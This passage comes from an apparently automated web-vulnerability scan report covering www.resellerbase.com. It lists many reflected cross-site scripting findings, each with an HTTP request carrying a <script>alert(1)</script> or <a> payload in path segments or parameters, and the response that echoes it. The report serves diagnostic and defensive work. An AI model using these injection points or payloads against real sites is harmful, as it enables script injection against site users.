The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 629cb<script>alert(1)</script>9ccb02c18bd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/40/themes/kosmos/images/rating/4half.gif?629cb<script>alert(1)</script>9ccb02c18bd=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:38:44 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/40/themes/kosmos/images/rating/4half.gif?629cb<script>alert(1)</script>9ccb02c18bd=1 was not found on this server.</p>
...[SNIP]...

2.2862. http://www.resellerbase.com/detail/40/themes/kosmos/images/rating/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/40/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 8a175<script>alert(1)</script>94027712134 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail8a175<script>alert(1)</script>94027712134/40/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/40/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:24:10 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail8a175<script>alert(1)</script>94027712134/40/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2863. http://www.resellerbase.com/detail/40/themes/kosmos/images/rating/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/40/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload e5933<script>alert(1)</script>9617c076aa4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/40e5933<script>alert(1)</script>9617c076aa4/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/40/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:24:24 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/40e5933<script>alert(1)</script>9617c076aa4/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2864. http://www.resellerbase.com/detail/40/themes/kosmos/images/rating/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/40/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload f34d7<script>alert(1)</script>d12116c6ad2 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/40/themesf34d7<script>alert(1)</script>d12116c6ad2/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/40/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:24:37 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/40/themesf34d7<script>alert(1)</script>d12116c6ad2/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2865. http://www.resellerbase.com/detail/40/themes/kosmos/images/rating/search.php [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/40/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload e5ed3<script>alert(1)</script>5a716667d20 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/40/themes/kosmose5ed3<script>alert(1)</script>5a716667d20/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/40/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:24:59 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/40/themes/kosmose5ed3<script>alert(1)</script>5a716667d20/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2866. http://www.resellerbase.com/detail/40/themes/kosmos/images/rating/search.php [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/40/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 7b56a<script>alert(1)</script>102f99ff36c was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/40/themes/kosmos/images7b56a<script>alert(1)</script>102f99ff36c/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/40/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:25:11 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/40/themes/kosmos/images7b56a<script>alert(1)</script>102f99ff36c/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2867. http://www.resellerbase.com/detail/40/themes/kosmos/images/rating/search.php [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/40/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 18fd9<script>alert(1)</script>356a74317b3 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/40/themes/kosmos/images/rating18fd9<script>alert(1)</script>356a74317b3/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/40/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:25:23 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/40/themes/kosmos/images/rating18fd9<script>alert(1)</script>356a74317b3/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2868. http://www.resellerbase.com/detail/40/themes/kosmos/images/rating/search.php [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/40/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 68d48<script>alert(1)</script>8aeae74aaf3 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/40/themes/kosmos/images/rating/search.php68d48<script>alert(1)</script>8aeae74aaf3?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/40/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:25:33 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/40/themes/kosmos/images/rating/search.php68d48<script>alert(1)</script>8aeae74aaf3?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2869. http://www.resellerbase.com/detail/40/themes/kosmos/images/rating/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/40/themes/kosmos/images/rating/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 1fe81<a>d3c37efa1bb was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/40/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search1fe81<a>d3c37efa1bb&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/40/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:21 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/40/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search1fe81<a>d3c37efa1bb&opt=2 was not found on this server.</p>
...[SNIP]...

2.2870. http://www.resellerbase.com/detail/40/themes/kosmos/images/rating/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/40/themes/kosmos/images/rating/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 2a3cc<a>61201582489 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/40/themes/kosmos/images/rating/search.php?keyword=search...2a3cc<a>61201582489&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/40/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:59 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/40/themes/kosmos/images/rating/search.php?keyword=search...2a3cc<a>61201582489&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2871. http://www.resellerbase.com/detail/40/themes/kosmos/images/rating/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/40/themes/kosmos/images/rating/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 2436c<script>alert(1)</script>d431ce73f09 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/40/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2&2436c<script>alert(1)</script>d431ce73f09=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/40/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:23:40 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/40/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2&2436c<script>alert(1)</script>d431ce73f09=1 was not found on this server.</p>
...[SNIP]...

2.2872. http://www.resellerbase.com/detail/40/themes/kosmos/images/rating/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/40/themes/kosmos/images/rating/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload cf3fd<a>a25ea90742 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/40/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2cf3fd<a>a25ea90742 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/40/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:39 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/40/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2cf3fd<a>a25ea90742 was not found on this server.</p>
...[SNIP]...

2.2873. http://www.resellerbase.com/detail/40/themes/kosmos/images/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/40/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 72a89<script>alert(1)</script>ca37edad059 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail72a89<script>alert(1)</script>ca37edad059/40/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/40/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:24:20 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail72a89<script>alert(1)</script>ca37edad059/40/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2874. http://www.resellerbase.com/detail/40/themes/kosmos/images/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/40/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload edde0<script>alert(1)</script>d9adcbe4d9e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/40edde0<script>alert(1)</script>d9adcbe4d9e/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/40/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:24:32 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/40edde0<script>alert(1)</script>d9adcbe4d9e/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2875. http://www.resellerbase.com/detail/40/themes/kosmos/images/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/40/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 70bc3<script>alert(1)</script>3483c25f9ae was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/40/themes70bc3<script>alert(1)</script>3483c25f9ae/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/40/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:24:46 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/40/themes70bc3<script>alert(1)</script>3483c25f9ae/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2876. http://www.resellerbase.com/detail/40/themes/kosmos/images/search.php [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/40/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload ea0f0<script>alert(1)</script>f502f0d6a38 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/40/themes/kosmosea0f0<script>alert(1)</script>f502f0d6a38/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/40/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:25:02 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/40/themes/kosmosea0f0<script>alert(1)</script>f502f0d6a38/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2877. http://www.resellerbase.com/detail/40/themes/kosmos/images/search.php [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/40/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload d25b7<script>alert(1)</script>1848360ea14 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/40/themes/kosmos/imagesd25b7<script>alert(1)</script>1848360ea14/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/40/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:25:13 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/40/themes/kosmos/imagesd25b7<script>alert(1)</script>1848360ea14/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2878. http://www.resellerbase.com/detail/40/themes/kosmos/images/search.php [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/40/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 21c24<script>alert(1)</script>f049405c926 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/40/themes/kosmos/images/search.php21c24<script>alert(1)</script>f049405c926?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/40/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:25:24 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
